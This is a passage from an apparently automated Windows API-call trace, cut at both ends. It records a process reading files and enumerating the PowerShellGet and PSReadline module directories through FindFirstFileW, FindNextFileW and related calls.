lpBuffer=0x25b5be94020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dca8, lpOverlapped=0x0 | out: lpBuffer=0x25b5be94020*, lpNumberOfBytesRead=0x653ef8dca8*=0x1000, lpOverlapped=0x0) returned 1 [0224.856] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5be94020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dca8, lpOverlapped=0x0 | out: lpBuffer=0x25b5be94020*, lpNumberOfBytesRead=0x653ef8dca8*=0xac4, lpOverlapped=0x0) returned 1 [0224.856] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5be93624, nNumberOfBytesToRead=0x13c, lpNumberOfBytesRead=0x653ef8dca8, lpOverlapped=0x0 | out: lpBuffer=0x25b5be93624*, lpNumberOfBytesRead=0x653ef8dca8*=0x0, lpOverlapped=0x0) returned 1 [0224.856] ReadFile (in: hFile=0x6f4, lpBuffer=0x25b5be94020, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8dca8, lpOverlapped=0x0 | out: lpBuffer=0x25b5be94020*, lpNumberOfBytesRead=0x653ef8dca8*=0x0, lpOverlapped=0x0) returned 1 [0224.856] CloseHandle (hObject=0x6f4) returned 1 [0224.858] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0224.858] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0224.858] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0224.858] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0224.859] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0224.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.859] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0x653ef8d890, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0224.859] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\*"), lpFindFileData=0x653ef8dac0 | out: lpFindFileData=0x653ef8dac0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.859] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.860] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0224.860] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0224.860] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.860] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ddb0) returned 1 [0224.860] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0x653ef8d890, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0224.860] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\*"), lpFindFileData=0x653ef8dac0 | out: lpFindFileData=0x653ef8dac0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.861] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.861] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0224.861] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8da80 | out: lpFindFileData=0x653ef8da80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 0 [0224.861] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.861] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dce0) returned 1 [0224.861] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dca0) returned 1 [0224.861] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dc20) returned 1 [0224.861] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", nBufferLength=0x105, lpBuffer=0x653ef8d700, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", lpFilePart=0x0) returned 0x39 [0224.861] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\*"), lpFindFileData=0x653ef8d930 | out: lpFindFileData=0x653ef8d930*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.862] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.862] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0224.862] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0224.862] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psd1", cAlternateFileName="PSREAD~1.PSD")) returned 1 [0224.863] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 1 [0224.863] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 0 [0224.863] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.863] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db50) returned 1 [0224.863] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db10) returned 1 [0224.863] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dc20) returned 1 [0224.863] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", nBufferLength=0x105, lpBuffer=0x653ef8d700, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", lpFilePart=0x0) returned 0x39 [0224.863] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\*"), lpFindFileData=0x653ef8d930 | out: lpFindFileData=0x653ef8d930*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.864] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.864] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0224.864] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0224.864] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psd1", cAlternateFileName="PSREAD~1.PSD")) returned 1 [0224.864] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 1 [0224.864] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d8f0 | out: lpFindFileData=0x653ef8d8f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0224.865] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db50) returned 1 [0224.865] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8db10) returned 1 [0224.865] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8da90) returned 1 [0224.865] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", nBufferLength=0x105, lpBuffer=0x653ef8d570, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", lpFilePart=0x0) returned 0x3c [0224.865] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\*"), lpFindFileData=0x653ef8d7a0 | out: lpFindFileData=0x653ef8d7a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.865] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d760 | out: lpFindFileData=0x653ef8d760*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.865] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d760 | out: lpFindFileData=0x653ef8d760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0224.866] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d760 | out: lpFindFileData=0x653ef8d760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0224.866] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d9c0) returned 1 [0224.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d980) returned 1 [0224.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8da90) returned 1 [0224.866] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", nBufferLength=0x105, lpBuffer=0x653ef8d570, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", lpFilePart=0x0) returned 0x3c [0224.866] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\*"), lpFindFileData=0x653ef8d7a0 | out: lpFindFileData=0x653ef8d7a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.866] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d760 | out: lpFindFileData=0x653ef8d760*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0224.868] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d760 | out: lpFindFileData=0x653ef8d760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xb7499523, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xb7499523, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.Resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0224.868] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d760 | out: lpFindFileData=0x653ef8d760*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0224.868] FindClose (in: hFindFile=0x25b73924110 | out: hFindFile=0x25b73924110) returned 1 [0224.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d9c0) returned 1 [0224.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d980) returned 1 [0224.868] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", nBufferLength=0x105, lpBuffer=0x653ef8d650, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", lpFilePart=0x0) returned 0x3c [0224.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8daa0) returned 1 [0224.868] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en"), fInfoLevelId=0x0, lpFileInformation=0x653ef8db80 | out: lpFileInformation=0x653ef8db80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8da60) returned 1 [0224.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8daf0) returned 1 [0224.868] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", nBufferLength=0x105, lpBuffer=0x653ef8d5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en", lpFilePart=0x0) returned 0x3c [0224.868] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\en\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\en\\*"), lpFindFileData=0x653ef8d800 | out: lpFindFileData=0x653ef8d800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73924110 [0224.869] FindNextFileW (in: hFindFile=0x25b73924110, lpFindFileData=0x653ef8d7c0 | out: lpFindFileData=0x653ef8d7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 